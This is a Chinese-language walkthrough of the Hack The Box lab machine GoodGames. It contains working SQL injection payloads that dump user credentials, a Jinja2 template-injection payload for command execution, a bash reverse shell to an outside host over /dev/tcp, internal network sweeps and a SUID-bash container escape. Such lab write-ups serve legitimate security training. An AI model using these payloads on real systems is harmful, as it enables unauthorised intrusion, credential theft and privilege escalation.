打靶记录(一二七)之HTBGoodGames

端口扫描

┌──(mikannse㉿kali)-[~/HTB/goodgames]
└─$ sudo nmap --min-rate=10000 -p- 10.10.11.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 23:30 CST
Nmap scan report for 10.10.11.130
Host is up (0.074s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 8.51 seconds

┌──(mikannse㉿kali)-[~/HTB/goodgames]
└─$ sudo nmap -sT -sV -sC -O -p80 10.10.11.130
[sudo] password for mikannse: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 23:36 CST
Nmap scan report for 10.10.11.130
Host is up (0.066s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.51
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
|_http-title: GoodGames | Community and Store
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.4 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), Linux 5.0 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 4.15 - 5.8 (93%), Adtran 424RG FTTH gateway (93%), Linux 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: goodgames.htb

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.92 seconds

┌──(mikannse㉿kali)-[~/HTB/goodgames]
└─$ sudo nmap --script=vuln -p80 10.10.11.130 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 23:37 CST
Nmap scan report for 10.10.11.130
Host is up (0.069s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.11.130
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.11.130:80/
|     Form id: 
|     Form action: #
|     
|     Path: http://10.10.11.130:80/
|     Form id: 
|     Form action: /login
|     
|     Path: http://10.10.11.130:80/forgot-password
|     Form id: 
|     Form action: /login
|     
|     Path: http://10.10.11.130:80/blog
|     Form id: 
|     Form action: #
|     
|     Path: http://10.10.11.130:80/blog
|     Form id: 
|     Form action: /login
|     
|     Path: http://10.10.11.130:80/blog/1
|     Form id: 
|     Form action: /login
|     
|     Path: http://10.10.11.130:80/store-product.html
|     Form id: 
|     Form action: #
|     
|     Path: http://10.10.11.130:80/store-product.html
|     Form id: 
|     Form action: #
|     
|     Path: http://10.10.11.130:80/coming-soon
|     Form id: 
|     Form action: //nkdev.us11.list-manage.com/subscribe/post?u=d433160c0c43dcf8ecd52402f&id=7eafafe8f0
|     
|     Path: http://10.10.11.130:80/coming-soon
|     Form id: 
|     Form action: #
|     
|     Path: http://10.10.11.130:80/coming-soon
|     Form id: 
|     Form action: #
|     
|     Path: http://10.10.11.130:80/login
|     Form id: 
|     Form action: #
|     
|     Path: http://10.10.11.130:80/login
|     Form id: 
|     Form action: #
|     
|     Path: http://10.10.11.130:80/
|     Form id: 
|     Form action: #
|     
|     Path: http://10.10.11.130:80/
|     Form id: 
|     Form action: /login
|     
|     Path: http://10.10.11.130:80/signup
|     Form id: 
|     Form action: /signup
|     
|     Path: http://10.10.11.130:80/signup
|     Form id: 
|     Form action: /login
|     
|     Path: http://10.10.11.130:80/signup
|     Form id: 
|     Form action: /login
|     
|     Path: http://10.10.11.130:80/index.html
|     Form id: 
|     Form action: #
|     
|     Path: http://10.10.11.130:80/index.html
|     Form id: 
|     Form action: #
|     
|     Path: http://10.10.11.130:80/blog-article.html
|     Form id: 
|     Form action: #
|     
|     Path: http://10.10.11.130:80/blog-article.html
|     Form id: 
|     Form action: #
|     
|     Path: http://10.10.11.130:80/blog/store-product.html
|     Form id: 
|     Form action: #
|     
|     Path: http://10.10.11.130:80/blog/store-product.html
|     Form id: 
|     Form action: #
|     
|     Path: http://10.10.11.130:80/blog/index.html
|     Form id: 
|     Form action: #
|     
|     Path: http://10.10.11.130:80/blog/index.html
|     Form id: 
|_    Form action: #
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-phpmyadmin-dir-traversal: 
|   VULNERABLE:
|   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
|     State: UNKNOWN (unable to test)
|     IDs:  CVE:CVE-2005-3299
|       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|       
|     Disclosure date: 2005-10-nil
|     Extra information:
|       ../../../../../etc/passwd :
|   <!DOCTYPE html>

Nmap done: 1 IP address (1 host up) scanned in 88.23 seconds

Web

是一个python的框架搭的，比较能利用的服务似乎也之后那个登录的服务了，抓包试了一下万能密码能够绕过登录

有一个dashboard界面可以访问，但是需要先添加两个hosts，访问之后还是需要用户凭证来登录

尝试跑sqlmap,但是似乎因为网络的问题结果有时候会跑一部分出来，尝试手注

email=admin'union select 1,2,3,group_concat(column_name) FROM information_schema.columns WHERE table_schema =database() AND table_name = 'user'-- -&password=1111

有四列:email,id,name,password

最终payload

email=admin'union select 1,2,3,group_concat(email,0x3a,id,0x3a,name,0x3a,password) FROM user-- -&password=1111

得到:

admin@goodgames.htb:1:admin:2b22337f218b2d82dfc3b6f77e7cb8ec

在线解密得到密码为:superadministrator

admin:superadministrator登录后台

在settings发现能更改个人信息，抓包发现传入的参数只有一个name,然后右边显示出了更改后的name，显然是一个ssti

name={{config.__class__.__init__.__globals__['os'].popen('whoami').read()}}

发现竟然是root身份???大概率是在容器中了所以环境也没那么完备，不知道什么鬼原因，反弹shell弹了好久

最终用这个payload弹成…

{{config.__class__.__init__.__globals__['os'].popen('bash -c "bash -i >& /dev/tcp/10.10.14.11/443 0>&1"').read()}}

docker逃逸

确实是在一个容器中，基本上只有扫描网段这一条路了,主机探测一下

root@3a453ab39d3d:/tmp# for i in {1..254}; do (ping -c 1 172.19.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
<grep "bytes from" | grep -v "Unreachable" &); done;
64 bytes from 172.19.0.1: icmp_seq=1 ttl=64 time=0.038 ms
64 bytes from 172.19.0.2: icmp_seq=1 ttl=64 time=0.037 ms

root@3a453ab39d3d:/tmp# for port in {1..65535}; do echo > /dev/tcp/172.19.0.1/$port && echo "$port open"; done 2>/dev/null     
<1/$port && echo "$port open"; done 2>/dev/null     
22 open
80 open

在容器里ssh到augustus账户，使用之前的密码

augustus@GoodGames:~$ cp /bin/bash .

回到root容器:

# chown root:root bash
# chmod 4755 bash

再到augustus用户:

augustus@GoodGames:~$ ./bash -p

/bin/bash -p 的特权模式主要是根据 Unix/Linux 系统的权限模型和 bash 的特殊处理来定义的。让我们深入了解一下这个机制：

1. Unix 权限模型：
   • 实际用户 ID (real UID)：启动进程的用户的 ID。
   • 有效用户 ID (effective UID)：决定进程实际权限的 ID。
   • 保存的设置用户 ID (saved set-user-ID)：用于临时切换权限。
2. setuid 机制：
   • 当一个可执行文件设置了 setuid 位时，它会以文件所有者的权限运行，而不是执行者的权限。

碎碎念

基本都是遇到过的东西，复习一下这种姿势的docker逃逸